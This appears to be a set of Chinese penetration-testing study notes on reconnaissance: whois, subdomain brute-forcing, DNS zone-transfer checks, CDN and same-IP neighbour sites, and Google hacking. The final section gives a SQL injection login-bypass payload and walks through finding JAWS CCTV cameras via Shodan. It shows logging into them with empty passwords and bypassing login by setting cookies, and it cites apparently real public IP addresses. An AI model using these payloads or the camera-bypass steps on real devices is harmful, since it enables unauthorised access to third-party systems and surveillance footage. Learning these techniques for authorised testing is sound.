文章目录
一、DNS信息
在收集DNS信息的时候,主要关注域名注册商,管理员联系方式,电话和邮箱,子域名等息。
1. whois 查询
- whois 是一个集成在kali 虚拟机中的小工具。whois工具可以用来查询域名注册信息,命令如下:
whois root # 显示指定用户信息
whois baidu.com # 查询域名描述信息
whois baidu.com # 查询域名信息
whois -H baidu.com # 查询域名信息省略法律声明
whois -p 80 baidu.com # 指定端口查询
- 也可以通过站长之家进行whois 查询 [http://whois.chinaz.com]
2. 反查
邮箱反查、注册人反查、电话反查
3. 子域名查询
- 可以查询子域名的网站 [https://searchdns.netcraft.com/] ,需要科学上网。在表单中直接提交域名即可,这种方法查询大型网站比较有优势。
- netcraft
- 证书
二、域传送漏洞
1. DNS区域传送(DNS zone transfer)
DNS区域传送是指一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库。这为运行中的DNS服务提供了一定的冗余度,其目的是为了防止主的域名服务器因意外故障变得不可用时影响到整个域名的解析。
一般来说,DNS区域传送操作只在网络里真的有备用域名DNS服务器时才有必要用到,但许多DNS服务器却被错误地配置成只要有client发出请求,就会向对方提供一个zone数据库的详细信息,所以说允许不受信任的因特网用户执行DNS区域传送(zone transfer)操作是后果最为严重的错误配置之一。
2. 使用dig 工具检测域传送漏洞
dig axfr@dns.example.com example.com
dig axfr@172.16.132.1 www.vulhub.org
3. 通过域名传送漏洞
子域名信息:子域名对应的IP地址
实验:子域名爆破
准备:一个字典里面写上所有可能的域名(4个字母左右别超过十个)。字典中的每个单词,依次去尝试,就叫做爆破
工具不重要,重要的是字典
工具:dnsrecon
dnsrecon -d vulnweb.com -D /root/tmp/1901/dic/dns.dic -tbrt
4. DNS2IP
DNS2IP:通过DNS解析找到IP 地址。
- ping
ping testfire.net
- ns lookup
- dig
dig testfire.net
dig @8.8.8.8 testfire.net # 指定dns服务器
dig +trace testfire.net # 获取域名的详细解析过程
- dnsenum
# 此处推荐使用dnsenum,此款工具在解析域名的时候,会自动检测域传送漏洞。
dnsenum testfire.net
5. 利用站长工具
http://tool.chinaz.com/dns/?type=1&host=testfire.net&ip=
路由追踪
6. CDN 加速的问题
CDN是内容分发网络,本意是进行节点缓存,使网站访问速度加快。一般情况下是没办法得到目标网站的真实IP 的。关于CDN 加速可以作为一个课题。参考资料如
https://www.t001s.net/articles-36160.html
http://www.91ri.org/6233.html
http://www.91ri.org/3563.html
三、IP查询
1. IP查询
http://ip.chinaz.com/65.61.137.117
2. 同IP 网站查询(IP 同站查询)
- 同一个IP 上的网站:网站A 和 网站B 都部署在 IP 地址为 1.1.1.1的服务器上,那么A、B就互为彼此的旁站。
- 如果攻击A不行,可以考虑攻击和A同IP的旁站B,因为A和B都在同一个服务器(相同的IP)上
- C段查询:1.1.1.*
- 同一个机房内的IP基本上都是连续的10.1.1.1-10.1.1.5,所以攻击10.1.1.1后,也可以攻击10.1.1.5
3. IPwhois 查询
- IP2Location:查询IP 地址经纬度
https://www.maxmind.com/zh/home 得到IP 地址的大致经纬度 - 通过GPS 查询物理位置
http://www.gpsspg.com/maps.htm
四、 利用搜索引擎搜集信息
1. google hacking
google机器人,爬行全世界所有网站的内容。google hacker就是利用搜索引擎语法,获取有关网站的信息。如果google搜索用不了的话,也可以考虑用其他搜索引擎。
- 探索网站目录结构 parent directory site:testfire.net
- 搜索容易存在sql 注入的页面 site:testfire.netinurl:login
- 搜索指定的文件类型 filetype pdf
2. 万能密码登录
- 在登录框中输入[admin/123456’or‘1’='1],即可登录系统。
- 实战:搜索公网摄像头——利用shodan 搜索
某一款CCTV 摄像头存在漏洞,管理该摄像头需要通过Web界面登录。所以我们可以通过搜索关键字找到公网中摄像头。- Step1. 搜索 JAWS/1.1
- Step2. 空口令登入:点击第一条连接,即可进入登录页面。
使用口令[admin/空],即可进入后台,查看摄像头。 http://197.149.45.145/view2.html - Step3. 登录绕过 http://86.99.112.102:9000/view2.html
在控制台中输入以下JS代码,然后直接访问[/view2.html],即可绕过登录验证进入控制台。
document.cookie=“dvr_camcnt=4”;
document.cookie=“dvr_usr=admin”;
document.cookie=“dvr_pwd=123”;